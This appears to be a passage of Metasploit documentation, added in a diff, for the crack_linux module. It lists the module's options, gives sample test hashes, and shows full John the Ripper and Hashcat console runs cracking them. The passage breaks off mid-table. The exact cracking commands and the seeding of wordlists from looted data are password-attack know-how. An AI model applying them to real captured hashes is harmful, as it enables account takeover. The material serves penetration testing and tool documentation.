+   **SHA512**
+
+   Crack SHA12 hashes. Default is `false`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+echo "" > /root/.msf4/john.pot
+echo "fakeV6xlcXxRM:55" >> /root/.msf4/john.pot
+echo "\$1\$O3JMY.Tw\$AdLnLjQ/5jXF9.fakegHv/:password" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+echo "toto" >> /tmp/wordlist
+creds add user:des2_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_55 hash:rDpJV6xlcXxRM jtr:des
+creds add user:des_pot_55 hash:fakeV6xlcXxRM jtr:des
+creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
+creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+creds add user:md52_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+creds add user:md5_pot_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.fakegHv/ jtr:md5
+creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
+creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256
+creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512
+creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, `blowfish true`, `sha256 true`, `sha512 true` to handle the bfish, sha256 and sha512 hashes,
+and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_linux
+resource (hashes_hashcat.rb)> set blowfish true
+blowfish => true
+resource (hashes_hashcat.rb)> set sha256 true
+sha256 => true
+resource (hashes_hashcat.rb)> set sha512 true
+sha512 => true
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-28293-u4ihgb
+[*] Wordlist file written out to /tmp/jtrtmp20190531-28293-19rhhdd
+[*] Checking md5crypt hashes already cracked...
+[*] Cracking md5crypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=JKDS2w8U --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=md5crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 100.0g/s 76800p/s 76800c/s 76800C/s test3:::..tere!
+Warning: passwords printed above might not be all those cracked
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking md5crypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=JKDS2w8U --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=md5crypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking md5crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=JKDS2w8U --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=md5crypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking md5crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=JKDS2w8U --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=md5crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1303   md5crypt   md5_password      password          Single
+ 1304   md5crypt   md52_password     password          Single
+ 1305   md5crypt   md5_pot_password  password          Already Cracked/POT
+
+[*] Checking descrypt hashes already cracked...
+[*] Cracking descrypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=TYlIcIco --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 100.0g/s 1102Kp/s 4410Kc/s 4410KC/s test3:::..t1900
+Warning: passwords printed above might be partial and not be all those cracked
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking descrypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=TYlIcIco --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+3g 0:00:00:00 DONE 1/3 (2019-05-31 15:20) 300.0g/s 614200p/s 614400c/s 614400C/s des_pass..Dde_pass
+Warning: passwords printed above might be partial
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking descrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=TYlIcIco --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking descrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=TYlIcIco --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1298   descrypt   des2_password     password          Single
+ 1299   descrypt   des_password      password          Single
+ 1300   descrypt   des_55            55                Normal
+ 1301   descrypt   des_pot_55        55                Already Cracked/POT
+ 1302   descrypt   des_passphrase    passphrase        Normal
+ 1303   md5crypt   md5_password      password          Single
+ 1304   md5crypt   md52_password     password          Single
+ 1305   md5crypt   md5_pot_password  password          Already Cracked/POT
+
+[*] Checking bsdicrypt hashes already cracked...
+[*] Cracking bsdicrypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=24lUijDR --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bsdicrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 50.00g/s 102400p/s 102400c/s 102400C/s test3:::..Tere6
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking bsdicrypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=24lUijDR --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bsdicrypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking bsdicrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=24lUijDR --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bsdicrypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking bsdicrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=24lUijDR --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bsdicrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1298   descrypt   des2_password     password          Single
+ 1299   descrypt   des_password      password          Single
+ 1300   descrypt   des_55            55                Normal
+ 1301   descrypt   des_pot_55        55                Already Cracked/POT
+ 1302   descrypt   des_passphrase    passphrase        Normal
+ 1303   md5crypt   md5_password      password          Single
+ 1304   md5crypt   md52_password     password          Single
+ 1305   md5crypt   md5_pot_password  password          Already Cracked/POT
+ 1306   bsdicrypt  bsdi_password     password          Single
+
+[*] Checking bcrypt hashes already cracked...
+[*] Cracking bcrypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=YCMwoPbH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bcrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 33.33g/s 2400p/s 2400c/s 2400C/s test3:::..test::0
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking bcrypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=YCMwoPbH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bcrypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking bcrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=YCMwoPbH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bcrypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking bcrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=YCMwoPbH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bcrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username           Cracked Password  Method
+ -----  ---------  --------           ----------------  ------
+ 1298   descrypt   des2_password      password          Single
+ 1299   descrypt   des_password       password          Single
+ 1300   descrypt   des_55             55                Normal
+ 1301   descrypt   des_pot_55         55                Already Cracked/POT
+ 1302   descrypt   des_passphrase     passphrase        Normal
+ 1303   md5crypt   md5_password       password          Single
+ 1304   md5crypt   md52_password      password          Single
+ 1305   md5crypt   md5_pot_password   password          Already Cracked/POT
+ 1306   bsdicrypt  bsdi_password      password          Single
+ 1309   bcrypt     blowfish_password  password          Single
+
+[*] Checking sha256crypt hashes already cracked...
+[*] Cracking sha256crypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=XVDR4pAU --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha256crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 2.173g/s 8904p/s 8904c/s 8904C/s test3:::..1foo
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking sha256crypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=XVDR4pAU --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha256crypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking sha256crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=XVDR4pAU --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha256crypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking sha256crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=XVDR4pAU --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha256crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type    Username           Cracked Password  Method
+ -----  ---------    --------           ----------------  ------
+ 1298   descrypt     des2_password      password          Single
+ 1299   descrypt     des_password       password          Single
+ 1300   descrypt     des_55             55                Normal
+ 1301   descrypt     des_pot_55         55                Already Cracked/POT
+ 1302   descrypt     des_passphrase     passphrase        Normal
+ 1303   md5crypt     md5_password       password          Single
+ 1304   md5crypt     md52_password      password          Single
+ 1305   md5crypt     md5_pot_password   password          Already Cracked/POT
+ 1306   bsdicrypt    bsdi_password      password          Single
+ 1307   sha256crypt  sha256_password    password          Single
+ 1309   bcrypt       blowfish_password  password          Single
+
+[*] Checking sha512crypt hashes already cracked...
+[*] Cracking sha512crypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJBNk8dS --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha512crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 4.545g/s 4654p/s 4654c/s 4654C/s test3:::..test2::k
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking sha512crypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=nJBNk8dS --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha512crypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking sha512crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJBNk8dS --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha512crypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking sha512crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=nJBNk8dS --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha512crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type    Username           Cracked Password  Method
+ -----  ---------    --------           ----------------  ------
+ 1298   descrypt     des2_password      password          Single
+ 1299   descrypt     des_password       password          Single
+ 1300   descrypt     des_55             55                Normal
+ 1301   descrypt     des_pot_55         55                Already Cracked/POT
+ 1302   descrypt     des_passphrase     passphrase        Normal
+ 1303   md5crypt     md5_password       password          Single
+ 1304   md5crypt     md52_password      password          Single
+ 1305   md5crypt     md5_pot_password   password          Already Cracked/POT
+ 1306   bsdicrypt    bsdi_password      password          Single
+ 1307   sha256crypt  sha256_password    password          Single
+ 1308   sha512crypt  sha512_password    password          Single
+ 1309   bcrypt       blowfish_password  password          Single
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                             realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
+                       des2_password      rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       des_55             rDpJV6xlcXxRM                                                                                              Nonreplayable hash  des
+                       des_pot_55         fakeV6xlcXxRM                                                                                              Nonreplayable hash  des
+                       des_passphrase     qiyh4XPJGsOZ2MEAyLkfWqeQ                                                                                   Nonreplayable hash  des
+                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       md52_password      $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       md5_pot_password   $1$O3JMY.Tw$AdLnLjQ/5jXF9.fakegHv/                                                                         Nonreplayable hash  md5
+                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
+                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256
+                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512
+                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
+                       md5_pot_password   password                                                                                                   Password            
+                       md5_password       password                                                                                                   Password            
+                       md52_password      password                                                                                                   Password            
+                       des_pot_55         55                                                                                                         Password            
+                       des2_password      password                                                                                                   Password            
+                       des_password       password                                                                                                   Password            
+                       des_55             55                                                                                                         Password            
+                       des_passphrase     passphrase                                                                                                 Password            
+                       bsdi_password      password                                                                                                   Password            
+                       blowfish_password  password                                                                                                   Password            
+                       sha256_password    password                                                                                                   Password            
+                       sha512_password    password                                                                                                   Password
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, `blowfish true`, `sha256 true`, `sha512 true` to handle the bfish, sha256 and sha512 hashes,
+and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_linux
+resource (hashes_hashcat.rb)> set blowfish true
+blowfish => true
+resource (hashes_hashcat.rb)> set sha256 true
+sha256 => true
+resource (hashes_hashcat.rb)> set sha512 true
+sha512 => true
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-28535-hi2lkf
+[*] Wordlist file written out to /tmp/jtrtmp20190531-28535-47c707
+[*] Checking md5crypt hashes already cracked...
+[*] Cracking md5crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=p5KJBBFs --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=500 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking md5crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=p5KJBBFs --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=500 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1327   md5crypt   md5_password      password          Wordlist
+ 1328   md5crypt   md52_password     password          Wordlist
+ 1329   md5crypt   md5_pot_password  password          Already Cracked/POT
+
+[*] Checking descrypt hashes already cracked...
+[*] Cracking descrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=8qLTJwqG --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1500 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking descrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=8qLTJwqG --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1500 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1322   descrypt   des2_password     password          Wordlist
+ 1323   descrypt   des_password      password          Wordlist
+ 1324   descrypt   des_55            55                Incremental
+ 1325   descrypt   des_pot_55        55                Already Cracked/POT
+ 1327   md5crypt   md5_password      password          Wordlist
+ 1328   md5crypt   md52_password     password          Wordlist
+ 1329   md5crypt   md5_pot_password  password          Already Cracked/POT
+
+[*] Checking bsdicrypt hashes already cracked...
+[*] Cracking bsdicrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=RShDcHzl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12400 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking bsdicrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=RShDcHzl --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12400 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1322   descrypt   des2_password     password          Wordlist
+ 1323   descrypt   des_password      password          Wordlist
+ 1324   descrypt   des_55            55                Incremental
+ 1325   descrypt   des_pot_55        55                Already Cracked/POT
+ 1327   md5crypt   md5_password      password          Wordlist
+ 1328   md5crypt   md52_password     password          Wordlist
+ 1329   md5crypt   md5_pot_password  password          Already Cracked/POT
+ 1330   bsdicrypt  bsdi_password     password          Wordlist
+
+[*] Checking bcrypt hashes already cracked...
+[*] Cracking bcrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=wNHLTkTX --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3200 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking bcrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=wNHLTkTX --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3200 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username           Cracked Password  Method
+ -----  ---------  --------           ----------------  ------
+ 1322   descrypt   des2_password      password          Wordlist
+ 1323   descrypt   des_password       password          Wordlist
+ 1324   descrypt   des_55             55                Incremental
+ 1325   descrypt   des_pot_55         55                Already Cracked/POT
+ 1327   md5crypt   md5_password       password          Wordlist
+ 1328   md5crypt   md52_password      password          Wordlist
+ 1329   md5crypt   md5_pot_password   password          Already Cracked/POT
+ 1330   bsdicrypt  bsdi_password      password          Wordlist
+ 1333   bcrypt     blowfish_password  password          Wordlist
+
+[*] Checking sha256crypt hashes already cracked...
+[*] Cracking sha256crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=uNQu0c8S --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=7400 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking sha256crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=uNQu0c8S --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=7400 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type    Username           Cracked Password  Method
+ -----  ---------    --------           ----------------  ------
+ 1322   descrypt     des2_password      password          Wordlist
+ 1323   descrypt     des_password       password          Wordlist
+ 1324   descrypt     des_55             55                Incremental
+ 1325   descrypt     des_pot_55         55                Already Cracked/POT
+ 1327   md5crypt     md5_password       password          Wordlist
+ 1328   md5crypt     md52_password      password          Wordlist
+ 1329   md5crypt     md5_pot_password   password          Already Cracked/POT
+ 1330   bsdicrypt    bsdi_password      password          Wordlist
+ 1331   sha256crypt  sha256_password    password          Wordlist
+ 1333   bcrypt       blowfish_password  password          Wordlist
+
+[*] Checking sha512crypt hashes already cracked...
+[*] Cracking sha512crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=0GST7Eb1 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1800 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking sha512crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=0GST7Eb1 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1800 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-28535-hi2lkf /tmp/jtrtmp20190531-28535-47c707
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type    Username           Cracked Password  Method
+ -----  ---------    --------           ----------------  ------
+ 1322   descrypt     des2_password      password          Wordlist
+ 1323   descrypt     des_password       password          Wordlist
+ 1324   descrypt     des_55             55                Incremental
+ 1325   descrypt     des_pot_55         55                Already Cracked/POT
+ 1327   md5crypt     md5_password       password          Wordlist
+ 1328   md5crypt     md52_password      password          Wordlist
